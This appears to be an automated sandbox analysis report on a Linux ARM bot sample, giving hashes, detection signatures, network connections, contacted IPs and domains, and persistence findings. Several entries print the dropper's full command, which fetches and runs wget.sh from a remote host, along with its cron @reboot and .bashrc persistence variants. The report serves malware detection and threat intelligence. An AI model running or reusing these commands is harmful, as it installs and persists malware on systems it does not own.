Linux Analysis Report
arm7.elf

Overview

General Information

Sample name: arm7.elf
Analysis ID: 1541201
MD5: f89985f03f8a27ab418e05bc232e4387
SHA1: b57e7df8cf4013be718f56be205e14919101e87a
SHA256: 15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: arm7.elf ReversingLabs: Detection: 15%
Found strings indicative of a multi-platform dropper
Source: .bashrc.32.dr String: cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: tmp.hGK4g5.38.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: bot.conf.32.dr String: exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 213.182.204.57 ports 24368,2,3,4,6,8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:46462 -> 88.151.195.22:7994
Source: global traffic TCP traffic: 192.168.2.23:39896 -> 213.182.204.57:24368
Sample listens on a socket
Source: /tmp/arm7.elf (PID: 6218) Socket: 127.0.0.1:1172 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: bot.conf.32.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal64.troj.linELF@0/3@3/0

Persistence and Installation Behavior
barindex
Executes the "crontab" command typically for achieving persistence
Source: /bin/sh (PID: 6228) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 6227) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Source: /tmp/arm7.elf (PID: 6218) File written: /root/.bashrc Jump to behavior
Sample tries to persist itself using cron
Source: /usr/bin/crontab (PID: 6227) File: /var/spool/cron/crontabs/tmp.hGK4g5 Jump to behavior
Source: /usr/bin/crontab (PID: 6227) File: /var/spool/cron/crontabs/root Jump to behavior
Creates hidden files and/or directories
Source: /tmp/arm7.elf (PID: 6218) File: /root/.bashrc Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6410/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6035/cmdline Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6357/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6412/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6411/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6391/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6390/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6403/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6402/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6405/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6404/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6407/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6406/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6409/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6408/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6362/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6361/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6364/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6386/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6363/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6366/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6388/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6365/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6387/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6401/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6389/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6360/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6359/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6414/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6358/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6413/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6416/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6415/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6418/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6417/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6419/status Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/arm7.elf (PID: 6220) Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" Jump to behavior
Source: /tmp/arm7.elf (PID: 6229) Shell command executed: /bin/sh -c "/sbin/initctl start bot" Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /usr/bin/dash (PID: 6197) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI Jump to behavior
Source: /usr/bin/dash (PID: 6209) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI Jump to behavior
Source: submitted sample Stderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: exit code = 0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/arm7.elf (PID: 6218) Queries kernel information via 'uname': Jump to behavior
Source: arm7.elf, 6218.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6235.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6294.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6236.1.0000558f057b1000.0000558f05928000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm7.elf, 6218.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6235.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6294.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6236.1.0000558f057b1000.0000558f05928000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm7.elf, 6218.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6235.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6294.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6236.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: arm7.elf, 6218.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6235.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6294.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6236.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp Binary or memory string: ^+x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf
Source: arm7.elf, 6294.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
213.182.204.57
 unknown Latvia
9009 M247GB true
88.151.195.22
 unknown Azerbaijan
15723 AZERONLINEAZ false
109.202.202.202
 unknown Switzerland
13030 INIT7CH false
91.189.91.43
 unknown United Kingdom
41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom
41231 CANONICAL-ASGB false

Contacted Domains

Name IP Active
kingstonwikkerink.dyn 185.82.200.181 true